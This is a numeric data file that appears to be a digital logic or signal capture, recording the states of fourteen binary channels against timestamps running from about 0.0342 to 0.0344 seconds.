1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4170960e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4170988e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171012e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171036e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171060e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171084e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171108e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171136e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171160e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171188e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171212e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171236e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171260e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171284e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171308e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171336e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171360e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171388e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171412e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171436e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171460e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171484e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171508e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171536e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171560e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171588e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171612e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171636e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171660e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171692e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171716e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171740e-02 1,1,0,0,1,0,0,0,0,0,0,0,1,0,3.4171764e-02 1,1,0,0,1,0,0,0,0,0,0,0,0,0,3.4171788e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,0,3.4171796e-02 1,1,0,0,1,1,0,0,0,1,0,0,0,1,3.4296204e-02 1,0,0,0,1,1,0,0,0,1,0,0,0,1,3.4296380e-02 0,0,0,0,1,1,0,0,0,1,0,0,0,1,3.4296384e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,3.4296404e-02 0,0,1,0,1,1,0,0,0,1,0,1,0,1,3.4296436e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,3.4296460e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,1,3.4296764e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,3.4296788e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.4296796e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,3.4296844e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.4296868e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,3.4296916e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.4296940e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,1,3.4296992e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.4297016e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297036e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4297068e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297092e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4297140e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297164e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4297188e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297216e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4297240e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297268e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4297316e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297340e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4297392e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297416e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4297420e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4297468e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4297492e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297500e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4297540e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297564e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4297616e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297644e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4297668e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297692e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4297696e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4297716e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4297740e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297748e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4297792e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297816e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4297868e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297892e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4297940e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4297964e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4298016e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4298044e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4298068e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4298092e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298100e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4298116e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298140e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4298148e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4298192e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4298216e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.4298220e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298224e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4298244e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298268e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4298292e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298316e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4298340e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298364e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4298388e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298416e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4298420e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4298468e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4298492e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298500e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4298516e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298540e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4298564e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298588e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4298596e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4298616e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4298640e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298648e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4298692e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298716e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4298764e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298788e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4298844e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,3.4298868e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4298872e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4298892e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4298916e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4298940e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4298964e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4298972e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4298988e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4299016e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.4299020e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299024e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299068e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299092e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299140e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299164e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299216e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299240e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299292e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299316e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,3.4299320e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4299324e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4299340e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4299364e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299372e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299388e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299416e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4299420e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4299468e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4299492e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299500e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299516e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299540e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299564e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299588e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299616e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299636e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299664e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299688e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4299692e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4299740e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4299764e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299772e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299788e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299816e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299836e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299864e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299888e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299916e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299940e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4299964e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4299988e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300016e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4300036e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300064e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4300088e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300116e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4300140e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300164e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4300188e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300216e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4300264e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300288e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4300340e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300364e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4300368e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4300416e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4300436e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300448e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4300488e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300516e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4300564e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300588e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4300616e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300636e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4300644e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4300664e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4300688e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.4300692e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300696e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4300740e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300764e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4300816e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300836e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4300888e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300916e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4300964e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4300988e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,3.4300992e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4300996e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4301016e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4301040e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301048e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301068e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301092e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301116e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301140e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4301148e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4301164e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4301188e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301196e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301244e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301268e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301316e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301340e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301392e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301416e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4301420e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4301440e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4301468e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.4301472e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301476e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301492e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301516e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301540e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301564e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301588e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301616e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301640e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301668e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301692e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301716e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301740e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301764e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301788e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301816e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301840e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4301868e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4301892e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4301916e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4301964e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4301988e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302044e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302068e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302116e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302140e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302192e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302216e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4302220e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4302240e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4302268e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.4302272e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302276e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302292e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302316e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4302320e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4302340e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4302364e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302372e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302416e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302440e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302492e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302516e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302564e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302588e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302636e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302664e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4302668e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4302688e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4302716e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.4302720e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302724e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302740e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302764e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302788e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302812e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302836e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302864e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302888e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302916e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302940e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4302964e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4302988e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303012e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303036e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303064e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303088e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303116e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303140e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303164e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303188e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303212e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303236e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303264e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303288e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303316e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303348e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303372e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303396e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303424e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303448e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303476e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303500e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303524e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303548e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303572e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303596e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303624e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303648e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303676e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303700e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303724e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303748e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303772e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303796e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303824e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303848e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303876e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303900e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303948e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4303972e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4303996e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4304024e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4304048e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4304076e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4304100e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4304124e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4304148e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4304172e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4304196e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4304224e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4304248e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4304276e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,3.4428108e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.4428336e-02 1,0,1,0,1,1,0,0,0,1,0,1,0,1,3.4428364e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.4428388e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.4428680e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.4428708e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.4428728e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.4428756e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.4428780e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.4428804e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.4428828e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.4428852e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.4428876e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.4428904e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.4428928e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4428940e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4428956e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4428960e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4428980e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4429004e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4429028e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4429052e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429060e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4429076e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429104e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4429128e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429156e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4429180e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429204e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4429228e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429252e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4429276e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429304e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4429308e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4429328e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4429356e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4429380e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4429404e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,3.4429408e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429412e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4429428e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429452e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4429476e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429504e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4429528e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429556e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4429580e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429604e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4429612e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4429628e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4429652e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4429676e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4429704e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429708e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4429728e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429756e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4429760e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4429780e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4429804e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4429828e-02 